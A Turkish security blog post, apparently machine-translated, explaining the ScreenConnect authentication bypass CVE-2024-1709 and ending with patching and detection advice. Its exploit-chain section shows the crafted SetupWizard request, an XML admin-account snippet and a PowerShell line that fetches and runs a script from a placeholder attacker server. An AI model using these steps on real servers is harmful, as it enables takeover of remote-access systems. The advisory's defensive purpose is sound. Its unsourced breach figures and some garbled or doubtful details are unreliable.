Fidye Yazılımı Saldırılarında Kritik ConnectWise ScreenConnect Güvenlik Açığı Kullanıldı

byCrow -

 

Fidye Yazılımı Saldırılarında Kritik ConnectWise ScreenConnect Güvenlik Açığı Kullanıldı

CVE-2024-1709, saldırganların kimlik bilgileri olmadan yönetimsel kontrol elde etmelerini sağlayan ConnectWise ScreenConnect'teki (sürüm ≤23.9.7) kritik bir kimlik doğrulama atlama güvenlik açığıdır. Maksimum CVSS puanı 10/10 olan bu kusur, saldırganların CVE-2024-1708 (yol geçişi) ile zincirlendiğinde sistemleri uzaktan tehlikeye atmalarına, ayrıcalıklı hesaplar oluşturmalarına ve kötü amaçlı yükler yürütmelerine olanak tanır .  Keşif sırasında 3.800'den fazla güvenlik açığı örneği açığa çıkarıldı ve fidye yazılımı kampanyalarında aktif istismar gözlemlendi .

CVE-2024-1709'un Teknik Analizi

Etkilenen Sürümler:

  • ScreenConnect 23.9.7 ve öncesi

  • Tüm dağıtım modları (bulut/şirket içi)


Saldırı Mekanizması: Bu güvenlik açığı , saldırganların şunları yapmasına olanak tanıyan
uygunsuz erişim kontrollerinden kaynaklanmaktadır /SetupWizard.aspx

  1. Değiştirilmiş HTTP istekleri aracılığıyla kurulum sonrası kurulum sihirbazına erişin

  2. Zorunlu yönlendirmeler yoluyla yeni yönetici hesapları oluşturun

  3. Çok faktörlü kimlik doğrulama (MFA) korumalarını atlatın

Exploit Zinciri Örneği (SlashAndGrab Saldırısı):

  1. İlk Erişim:/SetupWizard.aspx/ Saldırgan  , sonuna eğik çizgi 6 eklenmiş  hatalı biçimli bir istek gönderir :

    metin
    GET /SetupWizard.aspx/ HTTP/1.1
Host: vulnerable-host

    Bu, kurulum sihirbazı arayüzüne 302 yönlendirmesini tetikler .

  2. Ayrıcalık Yükseltmesi:  Saldırgan, XML yapılandırması aracılığıyla yönetici hesabı oluşturur:

    xml
    <User>
  <Id>hacker123</Id>
  <IsAdministrator>true</IsAdministrator>
  <PasswordHash>malicious_hash</PasswordHash>
</User>

    User.xml Bu , tam sistem ayrıcalıklarıyla yazılır  .

  3. Yük Dağıtımı :  CVE-2024-1708'i kullanarak saldırganlar şunları içeren ZIP arşivini yüklüyor:

    • Uzantı olarak gizlenmiş kötü amaçlı .ASHX web işleyicisi

    • Ters kabuklar için Base64 kodlu PowerShell komutları

    güç kabuğu
    IEX(New-Object Net.WebClient).DownloadString('http://attacker-server/payload.ps1')

  4. Yanal Hareket:  Başarılı bir şekilde kullanılması şunları sağlar: 

    • ToddlerShark fidye yazılımının dağıtımı (Kimsuky APT ile bağlantılı)

    • ScreenConnect'in güvenilir durumu aracılığıyla kimlik bilgisi toplama

    • ScreenConnect'in uzaktan erişim araçlarını kullanarak ağ yayılımı

Gerçek Dünya Etki Senaryoları 

Senaryo 1: Sağlık Veri İhlali
Saldırganlar, bölgesel bir hastanenin ScreenConnect sunucusunu (v23.9.6) tehlikeye atarak 450.000 hasta kaydını sızdırdı. LockBit fidye yazılımını dağıtmadan önce uç nokta korumasını devre dışı bırakmak için sahte yönetici hesapları kullandılar .

Senaryo 2: MSP Tedarik Zinciri Saldırısı
Yönetilen bir hizmet sağlayıcının yama uygulanmamış ScreenConnect örneği, saldırganların 1.200 istemci sistemine kötü amaçlı güncellemeler göndermesine olanak sağladı. Saldırganlar, ağ genelinde kripto para madencileri ve kalıcılık mekanizmaları kurdu .

Senaryo 3: Kritik Altyapı Tehlikesi
Devlet destekli aktörler, bir enerji şebekesi operatörünün sistemlerinde CVE-2024-1709'u istismar ederek 78 gün boyunca tespit edilemeyen erişimi korudular. SCADA sistemlerini ScreenConnect'in uzaktan CLI erişimi aracılığıyla manipüle ettiler .

Azaltma ve Müdahale 

  1. Hemen Yama Uygulaması: 

    • ScreenConnect ≥23.9.8'e yükseltin (kimlik doğrulama sertleştirmesini içerir)

    • Help > About ScreenConnect konsolunda doğrulayın 

  2. Uzlaşma Kontrolleri:

    sql
    SELECT * FROM User WHERE CreationDate > '2024-02-19'  
-- Audit admin accounts created after vulnerability disclosure[8]

    • App_Data\User.xml Şüpheli hesaplar için inceleme 

    • SetupWizard.aspx Web günlüklerine erişimi izleyin 

  3. Kontrol Önlemleri:

    • ScreenConnect sunucularının ağ segmentasyonu

    • Yama uygulamasından önce oluşturulan tüm API anahtarlarını/oturumlarını iptal edin

    • Yönetim arayüzleri için IP izin listesini uygulayın

  4. CISA Önerileri:

    • KEV #CVE-2024-1709 olarak kataloglanmıştır (eylem son tarihi 29 Şubat 2024)

    • Tüm ScreenConnect kullanıcıları için zorunlu kimlik bilgisi rotasyonu

Bu güvenlik açığı, güvenilir uzaktan erişim araçlarındaki kimlik doğrulama kusurlarının nasıl felaket niteliğinde ihlallere dönüşebileceğini göstermektedir. Genel istismar kullanılabilirliği (Şubat 2024'ten beri) ve ScreenConnect'in ayrıcalıklı erişim konumunun birleşimi, etkilenen tüm kuruluşlar için acil düzeltmeyi kritik hale getirir


Tags

Yorum Gönder

Daha yeni Daha eski

İletişim Formu